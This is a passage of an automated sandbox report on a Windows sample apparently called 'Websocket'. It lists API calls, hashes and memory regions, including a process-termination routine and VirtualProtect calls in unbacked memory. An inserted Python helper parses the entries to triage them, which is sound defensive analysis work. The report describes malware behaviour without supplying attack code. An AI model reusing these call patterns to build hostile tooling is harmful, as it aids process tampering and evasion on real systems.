                                    • Instruction Fuzzy Hash: CA11827111830196C734AB599852BFBB3E8EFC4358F144C3EE886C3691FA7C940983AB
                                    APIs
                                    • GetLastError.KERNEL32 ref: 0040E18D
                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    • WARNING: %s failed with error %d (%s), xrefs: 0040E1F4
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID: WARNING: %s failed with error %d (%s)
                                    • API String ID: 3479602957-1953342023
                                    • Opcode ID: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction ID: 71bfe3ff1a5da696a3addf6ac62f14f1fc4c04e671a446e7e169288bb51f98c2
                                    • Opcode Fuzzy Hash: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction Fuzzy Hash: 1201267160430066E7249B12DC86BFB3BA9EF8A710F504C3AF555CA1D0E6749890C29E
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction ID: 51d71b27c4b37dd042226c9a40541835d3d141334fbcb817b22f35dada8c7e80
                                    • Opcode Fuzzy Hash: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction Fuzzy Hash: 1C01527110830196C734AB589852BFBB3E9EFC4354F044D3EF986C3681EA3C944887AB
                                    APIs
                                    • OpenProcess.KERNEL32(00000401,00000000,?), ref: 0040E6C6
                                      • Part of subcall function 0040E2A0: OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                      • Part of subcall function 0040E2A0: CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 0040E6EE
                                    • CloseHandle.KERNEL32(00000000), ref: 0040E6FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Process$CloseHandleOpen$TerminateToken
                                    • String ID: SYSTEM
                                    • API String ID: 1755933052-968218125
                                    • Opcode ID: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction ID: 8e2cb8a182e1328e513b3a34ec3bf5da011a535263a81edc7ae68b639948cf14
                                    • Opcode Fuzzy Hash: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction Fuzzy Hash: C2F06275A0131067D330AB16AC0DFDB3FA8DBC9B10F418529F959E3282DA38880186AA
                                    APIs
                                    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 007321F9
                                    • SetLastError.KERNEL32(0000007E), ref: 0073223B
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: ErrorHugeLastRead
                                    • String ID:
                                    • API String ID: 3239643929-0
                                    • Opcode ID: 38b4f50d5fc10cb5cf5488caa4200bac3a0dcd409198d406b8535ebfa175ea2f
                                    • Instruction ID: 8a65c80facea493eda22a1f3806653ec6818a494a89910ec35f3fc8e1c731892
                                    • Opcode Fuzzy Hash: 38b4f50d5fc10cb5cf5488caa4200bac3a0dcd409198d406b8535ebfa175ea2f
                                    • Instruction Fuzzy Hash: 8E819B74A00209EFDB04DF94C994BAEB7B1FF48314F248158E959AB356D738AE81CF91
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041589E
                                    • __isleadbyte_l.LIBCMT ref: 004158D1
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00415902
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00415970
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction ID: 1bfa8a3c802f93689ab76b22000e8837c631d4e9b9b80ec41d52cc0f2dacea33
                                    • Opcode Fuzzy Hash: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction Fuzzy Hash: CE31D271A10646EFDB20EF64C880AEE3BB5FF81320F14856AE4659B2A1D334DDD0DB59
                                    APIs
                                    • _free.LIBCMT ref: 004167A8
                                      • Part of subcall function 0041025B: __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 0041025B: __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 0041025B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction ID: 3c08702fd25ada2266926da53e5058be595d777b16bfef6a83bfe969bb48a588
                                    • Opcode Fuzzy Hash: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction Fuzzy Hash: 6211EB32501611ABDB213FB5BC15ADA3794AF44378B21843BF869962A0DB3DCCC1869C
                                    APIs
                                    • GetCurrentProcessId.KERNEL32(00000000), ref: 0061A787
                                    • ProcessIdToSessionId.KERNEL32(00000000), ref: 0061A78A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                     • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentSession
                                    • String ID: .v
                                    • API String ID: 2701954971-2572790428
                                    • Opcode ID: 8f6147540655c5dcc8c1a0b7c3254943866f873b70ec0a541b892e1615da10e4
                                    • Instruction ID: 80ab9f63d68ca92badbdb68c855c1022b89936878b5d7901f3d29ebf53d8ac01
                                    • Opcode Fuzzy Hash: 8f6147540655c5dcc8c1a0b7c3254943866f873b70ec0a541b892e1615da10e4
                                    • Instruction Fuzzy Hash: 3E81A231B053008BDB64EFA4A8426FA72E7AFC4754B0C442EF845CB364EA34CD858793
                                    APIs
                                    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 00732468
                                    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 007324B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: @
                                    • API String ID: 544645111-2766056989
                                    • Opcode ID: 0b8acc029a2bf3115f6b01db21965f6733331665869268050a3c1f15ed0e78ac
                                    • Instruction ID: 5b5cd7114a10b83a89c8f63896335bb05dae223936752c69ec01c15552396c84
                                    • Opcode Fuzzy Hash: 0b8acc029a2bf3115f6b01db21965f6733331665869268050a3c1f15ed0e78ac
                                    • Instruction Fuzzy Hash: 5421E5B0A00249EFEF14CF98C980BADBBB5BF44304F208199D905AB242D778AF81DB55
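The two entries above that matter most for triage are the OpenProcess/TerminateProcess routine (ref 0040E6C6, in the PE-backed image at 0x400000) and the VirtualProtect pair (refs 00732468/007324B2, in the 0x731000 region that Joe reports as not backed by a PE). The following is an added example, not Joe Sandbox code and not part of this report: it parses the plain-text "APIs" / "Memory Dump Source" blocks exactly as they appear here, decodes the documented Win32 constants in the arguments, and flags those two patterns. The excerpt it runs on is copied from the entries above; the rule set and the handling of "?" (arguments Joe could not resolve) are this example's own assumptions. Note that Joe prints VirtualProtect arguments positionally, so the 0x40 in the second slot is dwSize, and the protection actually requested (third slot) is 0x04, PAGE_READWRITE, not PAGE_EXECUTE_READWRITE.

```python
"""Triage helper for per-function entries in a Joe Sandbox report.

Added example, not Joe Sandbox code. It parses the text form of the
'APIs' and 'Memory Dump Source' blocks and flags the combinations a
responder looks at first. Constants are documented Win32 values; the
rules themselves are this example's assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed input: three entries copied from the report above, trimmed to
# the lines this parser needs.
REPORT_EXCERPT = """\
APIs
• OpenProcess.KERNEL32(00000401,00000000,?), ref: 0040E6C6
  • Part of subcall function 0040E2A0: OpenProcessToken.ADVAPI32 ref: 0040E2D4
  • Part of subcall function 0040E2A0: CloseHandle.KERNEL32(?), ref: 0040E35E
• TerminateProcess.KERNEL32(00000000,00000009), ref: 0040E6EE
• CloseHandle.KERNEL32(00000000), ref: 0040E6FA
Strings
Memory Dump Source
• Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
APIs
• VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 00732468
• VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 007324B2
Strings
Memory Dump Source
• Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 0061A787
• ProcessIdToSessionId.KERNEL32(00000000), ref: 0061A78A
Strings
Memory Dump Source
• Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
"""

# One API reference line: "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR".
API_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)")
DUMP_RE = re.compile(r"Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")

# Documented Win32 constants used for decoding.
PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD",
                  0x8: "PROCESS_VM_OPERATION", 0x10: "PROCESS_VM_READ",
                  0x20: "PROCESS_VM_WRITE", 0x400: "PROCESS_QUERY_INFORMATION"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE"}


@dataclass
class Call:
    api: str
    module: str
    args: list        # raw hex strings, or "?" where Joe could not resolve the value
    ref: str
    indirect: bool    # True for "Part of subcall function" lines


@dataclass
class Entry:
    calls: list = field(default_factory=list)
    offset: int = 0
    pe_backed: bool = True


def parse_entries(text):
    """Split report text into one Entry per 'APIs' block."""
    entries = []
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            entries.append(Entry())
            continue
        if not entries:
            continue
        m = API_RE.search(s)
        if m and s.startswith("•"):
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            entries[-1].calls.append(
                Call(m["api"], m["mod"], args, m["ref"], "Part of subcall" in s))
            continue
        d = DUMP_RE.search(s)
        if d:
            entries[-1].offset = int(d["off"], 16)
            entries[-1].pe_backed = d["pe"] == "true"
    return entries


def hexarg(call, index):
    """Argument `index` as int, or None when Joe printed '?' for it."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def decode_flags(value, table):
    """Expand a bit mask into constant names, keeping any undocumented remainder."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    return names + ([f"0x{rest:x}"] if rest else [])


def triage(entries):
    """Human-readable findings for the combinations worth a second look."""
    findings = []
    for e in entries:
        direct = {c.api: c for c in e.calls if not c.indirect}
        where = f"at 0x{e.offset:X} ({'PE-backed' if e.pe_backed else 'not PE-backed'})"
        if "OpenProcess" in direct and "TerminateProcess" in direct:
            mask = hexarg(direct["OpenProcess"], 0) or 0
            code = hexarg(direct["TerminateProcess"], 1)
            findings.append(f"kills another process {where}: OpenProcess access "
                            f"{'|'.join(decode_flags(mask, PROCESS_ACCESS))}, exit code {code}")
        for c in e.calls:
            # VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect):
            # the protection is the THIRD argument; slot two is a size.
            if c.api == "VirtualProtect":
                size, prot = hexarg(c, 1), hexarg(c, 2)
                name = "unknown" if prot is None else PAGE_PROTECT.get(prot, hex(prot))
                findings.append(f"VirtualProtect {where}: {size} bytes set to {name}"
                                + ("" if e.pe_backed else " in unbacked memory"))
    return findings


if __name__ == "__main__":
    for finding in triage(parse_entries(REPORT_EXCERPT)):
        print(finding)
```

Run against the excerpt, the first entry is reported as a process kill with access mask PROCESS_TERMINATE|PROCESS_QUERY_INFORMATION (0x401) and exit code 9, and each VirtualProtect call in the 0x731000 region is reported as setting PAGE_READWRITE on unbacked memory. The third entry, from the Yara-matched 0x610000 region, produces no finding under these two rules; that is deliberate, since the rules only cover what the entries above show, and a real triage script would keep extending the rule set rather than read silence as benign.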
                                    APIs
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 004106F3
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 00410703
                                    • __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412F27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: csm
                                    • API String ID: 803148776-1018135373
                                    • Opcode ID: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction ID: 69b6639a9ef3a36a169a6a5565f12a55bffb05f741e2618f410494396190d148
                                    • Opcode Fuzzy Hash: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction Fuzzy Hash: 80014B348002058FCF34DF26D6406EEB3B5AF20311F14462FE44496359DBB89AE6EF49
                                    APIs
                                    • InitCommonControlsEx.COMCTL32 ref: 0040E7BF
                                    • CreateWindowExW.USER32(00000000,SysListView32,00419450,50010201,0000000A,00000028,00000190,000001F4,?,00000000,00000000,00000000), ref: 0040E7F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: CommonControlsCreateInitWindow
                                    • String ID: SysListView32
                                    • API String ID: 2646078016-78025650
                                    • Opcode ID: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction ID: f3d3e535e189fff61838196dd880c7fe0caa92239aab9ee536b101cdf5704626
                                    • Opcode Fuzzy Hash: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction Fuzzy Hash: 99E04F747843007FF6509B40DC5BF963764A788F05F50C024F649A51C0D6F46885866A